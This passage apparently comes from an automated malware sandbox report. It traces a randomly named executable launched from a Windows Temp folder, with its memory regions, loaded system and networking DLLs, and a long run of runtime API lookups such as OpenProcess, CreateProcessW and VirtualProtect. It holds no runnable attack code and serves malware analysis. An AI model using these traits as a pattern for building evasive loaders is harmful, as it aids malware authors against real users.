[268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0099.286] ResumeThread (hThread=0x48) returned 0x1 [0099.286] CloseHandle (hObject=0x48) returned 1 [0099.286] CloseHandle (hObject=0x4c) returned 1 [0099.286] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.287] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0099.287] ExitProcess (uExitCode=0x0) Process: id = "20" image_name = "yaqb5zg8.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe" page_root = "0x7ea16800" os_pid = "0xbbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xb58" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1344 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1345 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1346 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1347 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1348 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1349 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1350 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1351 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1352 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1363 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1364 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1365 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1366 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1367 start_va = 0x710000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1368 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1369 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1370 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1371 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1372 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1373 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1374 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1375 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1376 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1377 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1378 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1379 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1380 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1381 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1382 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1383 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1384 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1385 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1386 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1387 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1388 start_va = 0x810000 end_va = 0x140ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1389 start_va = 0x1410000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 1390 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1391 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1392 start_va = 0x1550000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 1393 start_va = 0x1700000 end_va = 0x19cefff entry_point = 0x1700000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1394 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1395 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1396 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x2a0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1397 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1398 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1399 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1400 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1401 start_va = 0x1550000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 1402 start_va = 0x16c0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 1403 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1404 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1405 start_va = 0x1550000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 1406 start_va = 0x1680000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 1407 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1408 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 27 os_tid = 0xbc0 [0097.991] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0097.996] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0097.996] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0097.998] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0097.998] 